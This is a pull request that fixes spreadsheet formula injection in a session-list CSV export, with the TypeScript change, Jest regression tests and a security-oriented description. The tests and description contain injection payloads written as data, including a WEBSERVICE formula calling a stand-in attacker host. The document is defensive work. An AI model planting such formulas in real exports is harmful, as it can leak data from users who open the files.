### PR TITLE
fix(ui): neutralize formulas in session CSV exports

### DIFF
--- a/apps/ui/src/__tests__/session-list-export.test.ts
+++ b/apps/ui/src/__tests__/session-list-export.test.ts
@@ -1,0 +1,95 @@
+import { listSessions } from "@/lib/api/sessions";
+import type { Session } from "@/lib/api/types";
+import { downloadSessionsCsv } from "@/lib/session-list-export";
+
+jest.mock("@/lib/api/sessions", () => ({
+  listSessions: jest.fn(),
+}));
+
+const mockListSessions = jest.mocked(listSessions);
+
+function blobText(blob: Blob): Promise<string> {
+  return new Promise((resolve, reject) => {
+    const reader = new FileReader();
+    reader.addEventListener("load", () => resolve(String(reader.result)));
+    reader.addEventListener("error", () => reject(reader.error));
+    reader.readAsText(blob);
+  });
+}
+
+function session(title: string): Session {
+  return {
+    id: "session-1",
+    organization_id: "org-1",
+    harness_id: "harness-1",
+    agent_id: "agent-1",
+    owner_principal_id: "principal-1",
+    title,
+    tags: [],
+    model_id: null,
+    status: "idle",
+    created_at: "2026-08-21T00:00:00Z",
+    updated_at: "2026-08-21T00:00:00Z",
+    started_at: null,
+    finished_at: null,
+  };
+}
+
+describe("session list CSV export", () => {
+  let downloadedBlob: Blob | undefined;
+
+  beforeEach(() => {
+    downloadedBlob = undefined;
+    mockListSessions.mockReset();
+    URL.createObjectURL = jest.fn((blob: Blob) => {
+      downloadedBlob = blob;
+      return "blob:sessions";
+    });
+    URL.revokeObjectURL = jest.fn();
+    jest.spyOn(HTMLAnchorElement.prototype, "click").mockImplementation(() => {});
+  });
+
+  afterEach(() => {
+    jest.restoreAllMocks();
+  });
+
+  it.each([
+    "=SUM(A1:A2)",
+    "+cmd",
+    "-2+3",
+    "@SUM(A1:A2)",
+    "\t=SUM(A1:A2)",
+    "\r=SUM(A1:A2)",
+    "\n=SUM(A1:A2)",
+  ])("neutralizes a formula-leading title beginning with %j", async (title) => {
+    mockListSessions.mockResolvedValueOnce({
+      data: [session(title)],
+      total: 1,
+      offset: 0,
+      limit: 100,
+    });
+
+    await downloadSessionsCsv({}, () => "safe agent");
+
+    const csv = await blobText(downloadedBlob!);
+    expect(csv).toContain(`'${title}`);
+    if (title.startsWith("\r") || title.startsWith("\n")) {
+      expect(csv).toContain(`,"'${title}"`);
+    }
+  });
+
+  it("neutralizes formula-leading agent names and preserves RFC 4180 quoting", async () => {
+    mockListSessions.mockResolvedValueOnce({
+      data: [session('ordinary, "quoted" title')],
+      total: 1,
+      offset: 0,
+      limit: 100,
+    });
+
+    await downloadSessionsCsv({}, () => '=WEBSERVICE("https://attacker.example")');
+
+    const csv = await blobText(downloadedBlob!);
+    expect(csv).toContain(`"'=WEBSERVICE(""https://attacker.example"")"`);
+    expect(csv).toContain(`"ordinary, ""quoted"" title"`);
+  });
+});

--- a/apps/ui/src/lib/session-list-export.ts
+++ b/apps/ui/src/lib/session-list-export.ts
@@ -26,8 +26,10 @@ export interface SessionsCsvResult {
 
 function csvCell(value: string | number | null | undefined): string {
   if (value === null || value === undefined) return "";
-  const text = String(value);
-  return /[",\n]/.test(text) ? `"${text.replaceAll('"', '""')}"` : text;
+  const rawText = String(value);
+  // THREAT[TM-API-019]: Neutralize spreadsheet formulas before RFC 4180 escaping.
+  const text = /^[=+@\t\r\n-]/.test(rawText) ? `'${rawText}` : rawText;
+  return /[",\r\n]/.test(text) ? `"${text.replaceAll('"', '""')}"` : text;
 }
 
 const HEADER = [


### PR DESCRIPTION
## What changed
Session list CSV downloads now prefix cells beginning with spreadsheet formula trigger characters with an apostrophe before applying RFC 4180 escaping. Regression coverage exercises session titles and agent display names across every supported trigger character.

## Why
Organization-controlled session titles and agent names could previously be exported as executable spreadsheet formulas, allowing formula injection when another user opened the CSV.

## Before / After
Before: values such as `=WEBSERVICE("https://attacker.example")` were emitted as formula-leading CSV cells.

After: the focused exporter test confirms all 8 cases pass, covering `=`, `+`, `-`, `@`, tab, carriage return, and line feed triggers plus quoted/comma-containing content. Formula-like values are emitted with a leading apostrophe.

## Risk
- Low
- CSV consumers will now see a literal leading apostrophe only for values that spreadsheet applications could interpret as formulas. Normal values and RFC 4180 quoting remain unchanged.

## Security
- Threat categories reviewed: TM-API (TM-API-019), TM-WEB
- Findings and resolutions: Confirmed formula injection in the client-side sessions CSV trust boundary. Neutralized every trigger recognized by TM-API-019 before CSV quoting and added end-to-end Blob output regression tests for user-controlled titles and agent names. No auth, authorization, tenancy, dependency, or resource-exhaustion surface changed.

## Follow-ups
No follow-ups.

## Checklist
- [x] Tests added or updated
- [x] Backward compatibility considered
- [x] Security review performed against relevant threat model categories
- [ ] Final CI ran checks affected by this PR
- [x] All review comments addressed (code change or written reasoning)
